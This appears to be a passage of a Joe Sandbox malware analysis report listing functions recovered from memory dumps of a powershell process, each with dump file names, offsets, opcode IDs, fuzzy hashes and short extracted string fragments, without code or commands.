Function 036EF3A9 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0153e091dbe85c02a82e216ce6b8c4e1d4efcedb4f10651bcbadc91494bdb710
Instruction ID: 3edb476de68d3bb6657ee7d6c6a22169ed5e06c7251a345bc49c3b3f93e4130a
Opcode Fuzzy Hash: 0153e091dbe85c02a82e216ce6b8c4e1d4efcedb4f10651bcbadc91494bdb710
Instruction Fuzzy Hash: 7D01E971D05B4ADFCB14CFE4C9445EEBBB1FF9A314F201B1AD015AA611EBB12586DB80

Function 0366D993 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1743993819.000000000366D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0366D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_366d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9803e4442b75557ce4b61105044570fd81936647417447c4216bdf246b40239
Instruction ID: 474107f5d56d7ff824fa79ddcf7a1ba723df341224636eea9c4113bde6108602
Opcode Fuzzy Hash: c9803e4442b75557ce4b61105044570fd81936647417447c4216bdf246b40239
Instruction Fuzzy Hash: 48F0F9B6200600AFD720CF0AD984C27FBADEBD4670319C55AEC4A4B712C671EC42CEA0

Function 036E90D8 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2cbc8bd784efebea669c6d10ba6e9231708001b831e60bf12edb7b2a09778db
Instruction ID: ecc8308d27d4b5cd128230d39f1cdf196b120220a9226007a1f658d5baf51bed
Opcode Fuzzy Hash: c2cbc8bd784efebea669c6d10ba6e9231708001b831e60bf12edb7b2a09778db
Instruction Fuzzy Hash: 24F0F679A083504FD705EF24D05439B7BA1DFC2365F11409EC4058F39ACE391806CBA1

Function 036EDE38 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd44c788cf03180ee2d946f363df415cf0dc9972fad4332b5ba3addde5738541
Instruction ID: 2626f080849c8a63d96adb340e7a8335720123b0e18c4fe927e5434d2b1aa827
Opcode Fuzzy Hash: dd44c788cf03180ee2d946f363df415cf0dc9972fad4332b5ba3addde5738541
Instruction Fuzzy Hash: 51F05E397052408FC311DB2DD494C76BBF59FDA21532910DAE485CB772CA61CC41CB50

Function 0366D984 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1743993819.000000000366D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0366D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_366d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73dfefbb4ec38f87c4c28ca808e6740d0a8ee8f98ea6d924f96f1e1e20d282d9
Instruction ID: 87ebdc41ca1b1c1b28d21a82be8c6805b5245dfd0f25b9e78c19085cb64d8f94
Opcode Fuzzy Hash: 73dfefbb4ec38f87c4c28ca808e6740d0a8ee8f98ea6d924f96f1e1e20d282d9
Instruction Fuzzy Hash: 1DF0F9B5204A40AFD725CF06CD84D23BBB9EBD5660B198599A84A4B752C671FC42CFA0

Function 036EF3B8 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18825c55f89a01893ff01d04719b9fbb25985c624b9a82ed99c8d83e83baaeb2
Instruction ID: b16ba4428ce10b11fd647e29feea23ef9196cf366b02330af2a04d418fe014e3
Opcode Fuzzy Hash: 18825c55f89a01893ff01d04719b9fbb25985c624b9a82ed99c8d83e83baaeb2
Instruction Fuzzy Hash: D601E871D0574ADFCB04DFE4C8445EEBBB1FF99300F10071AE015A6605EBB02696CB80

Function 036E7968 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246e783d79aeeb390ac76bddb3548f9949d178b24bce07d3d8d08188bf2a7056
Instruction ID: 35118f60996f22421049eb0127b7344dd033bcaa62275c82db1d4a44f05aba43
Opcode Fuzzy Hash: 246e783d79aeeb390ac76bddb3548f9949d178b24bce07d3d8d08188bf2a7056
Instruction Fuzzy Hash: B3F0A7757007149FC710D65AE84496F77EAEB89661B00092DE10EC7340DF70AC4687A4

Function 036E90E8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee065ec7160933307bd792e50f675cf5a4309fe13ad3746c38393e68c48a8d6d
Instruction ID: 6a37d4677810f2e147ca72c72773a48260efd6d91568bc59f2655037e758e65c
Opcode Fuzzy Hash: ee065ec7160933307bd792e50f675cf5a4309fe13ad3746c38393e68c48a8d6d
Instruction Fuzzy Hash: 99F02739A042144BD704EB69D00839BB7A6DFC1364F10812EC50A4B399CE7E6C06C7E4

Function 036E7697 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9722372e65c5af4a5cf15649578f876935a54366647ca3b672aac6c427b7d6af
Instruction ID: 7851f83918cca3cf85cc61031f88a0fb9465a525632879a1d6aeed308b46a12a
Opcode Fuzzy Hash: 9722372e65c5af4a5cf15649578f876935a54366647ca3b672aac6c427b7d6af
Instruction Fuzzy Hash: 51F065797002188FCB10EBADD940A9ABBF6FBCC6567194199E50ACF324DF34DC168B91

Function 036E9158 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ede935a45ee4010bc33e70659b2aa8972e80fa3ef3865299b2dd60bad4b0900
Instruction ID: d6e2192e3bceaf335b7279572e8b6382eb1a84ee7c237860057807824ab85a47
Opcode Fuzzy Hash: 3ede935a45ee4010bc33e70659b2aa8972e80fa3ef3865299b2dd60bad4b0900
Instruction Fuzzy Hash: E7F05E74A093404FD761DF78D49839A7FF1EB46310F1404AED54ACB292DB395845C750

Function 036EDE48 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153ef1cfcf6de97d1800755ac39118d8375fb6cc3ef04963c526a7d29ab0ca17
Instruction ID: 208ad865470305ada9f4f0e5cc1c07ceaabec6af94c94be2f91403ea04d34b68
Opcode Fuzzy Hash: 153ef1cfcf6de97d1800755ac39118d8375fb6cc3ef04963c526a7d29ab0ca17
Instruction Fuzzy Hash: 34E01A397012108F8310DB1ED498C26B7FAEFCE76572900A9E549CB731DA71EC01CB90

Function 036EDCD9 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6f104d71147526e3eae4262dd0ecc3e912e0e2e3253f4a851162b5b7a90a56e
Instruction ID: 1f1c00b7bb89790c61f324a52d123ba2ada6aaf2054c1c5653206f2aae24f798
Opcode Fuzzy Hash: c6f104d71147526e3eae4262dd0ecc3e912e0e2e3253f4a851162b5b7a90a56e
Instruction Fuzzy Hash: 1FE02B317114809BCB08CA6DD4044FDFFB99FCA220F14807ED446EB310CA71541B97E0

Function 036E8969 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f545d6f37be186fc74d4a7bf2f673d36769295fe70d116ec1f8ba203c971029
Instruction ID: b533fee82d2499ae2398e72d38de14eebb0512593e6267cc73450ed96fb7e864
Opcode Fuzzy Hash: 4f545d6f37be186fc74d4a7bf2f673d36769295fe70d116ec1f8ba203c971029
Instruction Fuzzy Hash: 3AF0A0397092905BCF09A778A4087EE6EA2ABC5214F04016EE60A87642CE69090687D5

Function 036E9168 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e2c453bb107c5c49fa90933fdde481431122dfdb58af8193ac5690c0810565a
Instruction ID: 943ca75bc4ac68f013c9059e7ec6befead57f72a090ec58d87f1747a4695827c
Opcode Fuzzy Hash: 5e2c453bb107c5c49fa90933fdde481431122dfdb58af8193ac5690c0810565a
Instruction Fuzzy Hash: 51F06D789003048BD760DB79E49C39ABBE9EB84310F10446DE10EC7340DB3968818B90

Function 036E9549 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d380d2c39285db27948ceec1d14b37e6ae537af579977017f93d141a0249bd3c
Instruction ID: 5fafe561e94266377000a50dc6bd601e2f59aa1ab96c10906c26fddd9149edf3
Opcode Fuzzy Hash: d380d2c39285db27948ceec1d14b37e6ae537af579977017f93d141a0249bd3c
Instruction Fuzzy Hash: 55E0C217B032210B4664F2B916006BB89CA8EC6CA1708023DC905DB781DD54CC1907E0

Function 036EAF88 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f31da01a8fb233e65798588b5b93bc073ad1aa12b84582a6e15778298ccbcd80
Instruction ID: 15a22f77425b0a96e0159f6c3adb4ad6376fadc13c9e7b9e0e64fcb7088aa825
Opcode Fuzzy Hash: f31da01a8fb233e65798588b5b93bc073ad1aa12b84582a6e15778298ccbcd80
Instruction Fuzzy Hash: 8CE0861574E3D10B5B16957DA4204AA5FB24EC751031E81BAD084CF206C8518C0A43A1

Function 036E8978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba0b7da178fe2e833ee772d713e2cd79bf98217fdf6290946ace51356afcde6b
Instruction ID: 02a483774194f135e758b451593904d2ba3efd3f288703b882a5faaf51fc772b
Opcode Fuzzy Hash: ba0b7da178fe2e833ee772d713e2cd79bf98217fdf6290946ace51356afcde6b
Instruction Fuzzy Hash: 47E0DF3930431057CF082779A40C3AE7A5AEBC4724F00002EE60A87341CF6A680283E9

Function 036E9550 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fda17a8e340296e1d46129b9fd7d42169ba7bd3d7ebdfa329be45d7df16c2785
Instruction ID: 682edb7dc23d3cc32dfa57994aeb453ce71a03ec699a1514c5c929afada60981
Opcode Fuzzy Hash: fda17a8e340296e1d46129b9fd7d42169ba7bd3d7ebdfa329be45d7df16c2785
Instruction Fuzzy Hash: A2D05E17703231174568B2BA1A007BBA5CE8EC7CA1709013ADA09CB381ED45CC1903F5

Function 036EDCE8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: a512f13118da998e546267dc386d3a74a8b3c569869918b0e830b38661fc733a
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: F9E08631B100149BCB08DA99D4144EDF7AADBCC220F14807AD90AA7340DA32591A87E1

Function 036E8739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f039f79d067b1d92b810cc46bf5ce7f4c74b10291c9d6e345f73677fb0818eb
Instruction ID: c60ba194aa51e3b101e59a3208c5de273a8398817eb40d64c6a2229f4703ddb5
Opcode Fuzzy Hash: 9f039f79d067b1d92b810cc46bf5ce7f4c74b10291c9d6e345f73677fb0818eb
Instruction Fuzzy Hash: AAE04F75D150458FCF06DF60E4496ED7F70EA56315B00009DD45257952DA72454BCB80

Function 036E8800 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6ea85b4893f9406b049141b3f4834ae983890b9d91b563ca729e19eca0b08df
Instruction ID: a55905dfea9c27159ce47a53fd29df627b1bcf33c2c1106ca7373a605037062f
Opcode Fuzzy Hash: a6ea85b4893f9406b049141b3f4834ae983890b9d91b563ca729e19eca0b08df
Instruction Fuzzy Hash: E4E04F349092868FCB05EFACE04586FBFB1EB5A214B10429DE9469B642D6710956DF81

Function 036EF860 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: b49b179cfaca562794cf96dddc0cf6a8e5c55110f867f7c14b2887bffeb9119d
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 1CD042B0D05209AF8780EFA9894156EFBF4AB48210B6085AB8919E7201E6329A128BD1

Function 036E8748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da257c3d89b563a0b81bf9677962657ffbcc166d475cbde3229133822ba82b98
Instruction ID: 0fd0d318bea8e41861d1c7caaa12956da17fd9227d5f65658e420da775bef052
Opcode Fuzzy Hash: da257c3d89b563a0b81bf9677962657ffbcc166d475cbde3229133822ba82b98
Instruction Fuzzy Hash: 77D067398051098BCF08EBA4F85A5BDBB74FA54302F40516DE91752592EA321A5BCAC5

Function 036E8810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca4ffb5bce2ed6b5bc9ae8c45ded7898bf302979c6c32f3c8d768e61de992ec
Instruction ID: 3ada6b672cf393efd286326d48f2c97c1be12f3e2ed9d79f5deaf0e70fcf0345
Opcode Fuzzy Hash: 7ca4ffb5bce2ed6b5bc9ae8c45ded7898bf302979c6c32f3c8d768e61de992ec
Instruction Fuzzy Hash: 84D05B34D0420A8FCB08DF68E44556DBBB5EB44300F004159ED0593740E7315D06CFC1

Function 036E7932 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e1df70d6abee7edc07da41e686dea691815adb3b4bc969f57eb9aca1b0f5a33
Instruction ID: 8f35a9832645d0c671c4a7f8f0062a67d84ce6779cbb166b15344a928bd78902
Opcode Fuzzy Hash: 6e1df70d6abee7edc07da41e686dea691815adb3b4bc969f57eb9aca1b0f5a33
Instruction Fuzzy Hash: 3FD0C93444EBC49FC7178F7994998183F316E0322575A04EED88A8F5B7C9768589CB16

Function 036E7EA0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f85968a2963e22a224d915dec77903dccf9d289ad3eaa26f35104d344351070e
Instruction ID: db01ea75134923539fce0f4d2509c519b95e9b1df1fb463577247c2f0cd61891
Opcode Fuzzy Hash: f85968a2963e22a224d915dec77903dccf9d289ad3eaa26f35104d344351070e
Instruction Fuzzy Hash: 73C04C2480EBD05FDF13833D4C9A5077FB2098351970A55DAC182DF867C9A9884AC753

Function 036E7940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36a068b87e2f66900319b767620dce3cdbea466737e218659a820706469ad2ce
Instruction ID: 3d487e29e4a7b670f476a63146ce720eb3edea56a9aec5f904f654ea4fc695fe
Opcode Fuzzy Hash: 36a068b87e2f66900319b767620dce3cdbea466737e218659a820706469ad2ce
Instruction Fuzzy Hash: E5B09230044708CFC248AFBAA4058147329BB4221538108A9ED0E0A2A68E36E885CA48

Non-executed Functions

Function 07D20FDD Relevance: 20.3, Strings: 16, Instructions: 294COMMON

Download Yara Rule

Strings

84Kl, xrefs: 07D210DE
$dq, xrefs: 07D21239
$dq, xrefs: 07D21044
tPdq, xrefs: 07D21133
`Qdq, xrefs: 07D210ED
`Qdq, xrefs: 07D21193
$dq, xrefs: 07D21081
tPdq, xrefs: 07D21127
fiq, xrefs: 07D210A2
$dq, xrefs: 07D21229
84Kl, xrefs: 07D210D4
$dq, xrefs: 07D21263
$dq, xrefs: 07D21065
$dq, xrefs: 07D21253
`Qdq, xrefs: 07D2115F
`Qdq, xrefs: 07D21153

Memory Dump Source

Source File: 00000008.00000002.1755715329.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d20000_powershell.jbxd

Similarity

API ID:
String ID: fiq$84Kl$84Kl$`Qdq$`Qdq$`Qdq$`Qdq$tPdq$tPdq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-3222819075
Opcode ID: 97c8a9e26bece15b6ef80270b3a8becf472eb338ef45594cb7a2a3b4b896bc3d
Instruction ID: 60fea20a6baaadf8d39acfd252df2490e66e3cadac4c35010a7a35b07fb21162
Opcode Fuzzy Hash: 97c8a9e26bece15b6ef80270b3a8becf472eb338ef45594cb7a2a3b4b896bc3d
Instruction Fuzzy Hash: 89B1C2B170022EDFDB15DE58C941AABBBB2BFA5346F14C455E8019B281CB32DD43DBA1

Function 036E7A21 Relevance: 6.5, Strings: 5, Instructions: 241COMMON

Download Yara Rule

Strings

`eq, xrefs: 036E7B23
`eq, xrefs: 036E7BA2
tMMl, xrefs: 036E7AD4
`eq, xrefs: 036E7C44
`eq, xrefs: 036E7CC2

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID: tMMl$`eq$`eq$`eq$`eq
API String ID: 0-1490437013
Opcode ID: 20c59af791fa25d6e03da0cbe92437cc2223109c2121478085dd22616ed47c50
Instruction ID: 5b88fd2358c608fad709e92686b563e0e8a1b32d1ff653b913851212b4d0abbe
Opcode Fuzzy Hash: 20c59af791fa25d6e03da0cbe92437cc2223109c2121478085dd22616ed47c50
Instruction Fuzzy Hash: D9B19274E016199FCB54DFA9D590A9DFBF2FF48300F148629E419AB354DB30A945CF90

Function 036E7A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

`eq, xrefs: 036E7B23
`eq, xrefs: 036E7BA2
tMMl, xrefs: 036E7AD4
`eq, xrefs: 036E7C44
`eq, xrefs: 036E7CC2

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID: tMMl$`eq$`eq$`eq$`eq
API String ID: 0-1490437013
Opcode ID: 6423cd11610d16502a9a5cd5071b9a79eb6465542697ef0720f9a8b35d7dfce4
Instruction ID: 142ab0d0c95f1179d1ea2ab15758679bbc23b43cd1b142f5aea3e426989768b1
Opcode Fuzzy Hash: 6423cd11610d16502a9a5cd5071b9a79eb6465542697ef0720f9a8b35d7dfce4
Instruction Fuzzy Hash: 8FB18274E016199FCB54DFA9D990A9DFBF2FF48300F108629E819AB354DB30A945CF90

Function 036E4D62 Relevance: 6.4, Strings: 5, Instructions: 119COMMON

Download Yara Rule

Strings

Co^, xrefs: 036E4D82
Co^, xrefs: 036E4DE2
Co^, xrefs: 036E4D62
Co^, xrefs: 036E4D92
Co^, xrefs: 036E4DD2

Memory Dump Source

Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd

Similarity

API ID:
String ID: Co^$Co^$Co^$Co^$Co^
API String ID: 0-2499377247
Opcode ID: 0c13d4e0bab4e42abb9396158d9b5ab9628d29b52803efecf296c02c1097b2c2
Instruction ID: dbdfcba40a7a095a14e8aa356264e04bd50ac53f699cc9a494617202fa38d010
Opcode Fuzzy Hash: 0c13d4e0bab4e42abb9396158d9b5ab9628d29b52803efecf296c02c1097b2c2
Instruction Fuzzy Hash: 66413A6260E7C00FC307DB3E98A45957FB5AFA729471A00DBD0D4CF667D9189C0AC7A2

Function 07D237F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON

Download Yara Rule

Strings

Cl, xrefs: 07D2387B
$dq, xrefs: 07D237FF
$dq, xrefs: 07D23836
$dq, xrefs: 07D2382A
Cl, xrefs: 07D2386D

Memory Dump Source

Source File: 00000008.00000002.1755715329.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d20000_powershell.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$Cl$Cl
API String ID: 0-344882793
Opcode ID: 9ff3b8dafa628d187ec89b62187bb88bd07bff3c765a90f399ec84ccb69aedf7
Instruction ID: 76989a19cd63d12a74955432c6280a127bf1f7841bcce5b11038c2388c74e6b2
Opcode Fuzzy Hash: 9ff3b8dafa628d187ec89b62187bb88bd07bff3c765a90f399ec84ccb69aedf7
Instruction Fuzzy Hash: E611E9B13143269BDB24591AD804B67FBA7EFE5725F24C02FA9498F280CE39C843D791

Function 07D25798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$dq, xrefs: 07D257AA
$dq, xrefs: 07D25800
$dq, xrefs: 07D257F4
$dq, xrefs: 07D257C6

Memory Dump Source

Source File: 00000008.00000002.1755715329.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d20000_powershell.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: 5b4fbbc2eb289ae1c919fd974ce686fae43de0555ebe63a22d50f8b3d611d3b4
Instruction ID: 22573f4a0b89b8f5927b9a6221488284a453ffdfc64e5a049d246ccbb5d25c35
Opcode Fuzzy Hash: 5b4fbbc2eb289ae1c919fd974ce686fae43de0555ebe63a22d50f8b3d611d3b4
Instruction Fuzzy Hash: 1A217CB1310226ABDB246529A801F37FBD79BD0315F34807A9A47CB2C1DD75D9139361

Function 07D233F4 Relevance: 5.1, Strings: 4, Instructions: 84COMMON

Download Yara Rule

Strings

p5=k, xrefs: 07D2344F
,SMl, xrefs: 07D2345D
RMl, xrefs: 07D2342B
,SMl, xrefs: 07D23469

Memory Dump Source

Source File: 00000008.00000002.1755715329.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d20000_powershell.jbxd

Similarity

API ID:
String ID: ,SMl$,SMl$p5=k$RMl
API String ID: 0-4239231537
Opcode ID: b91c9b5a843e1428ade48055175d4fdbc1c1259012a14dd326c12a9b47661519
Instruction ID: 9c21f59580c5f7f9d1f45b020d930525a33e4f6c3c38f61422919af60bcbb561
Opcode Fuzzy Hash: b91c9b5a843e1428ade48055175d4fdbc1c1259012a14dd326c12a9b47661519
Instruction Fuzzy Hash: 09217DF27002368BCB22966C5811A66FBD1DFF6229F1484FBC8868B640DF39D843D761

Function 07D2030A Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

$dq, xrefs: 07D2035E
$dq, xrefs: 07D20352
4'dq, xrefs: 07D2037F
4'dq, xrefs: 07D20373

Memory Dump Source

Source File: 00000008.00000002.1755715329.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d20000_powershell.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq$$dq$$dq
API String ID: 0-4229963660
Opcode ID: 49a6c8a3d0a786d0d0366e51987050269a1c492be2e224f43f61bc82f96e8b13
Instruction ID: 1319d26b1cc3bf62f4d37758b9ad28e730008729cf39c9d93dec86cfb4974add
Opcode Fuzzy Hash: 49a6c8a3d0a786d0d0366e51987050269a1c492be2e224f43f61bc82f96e8b13
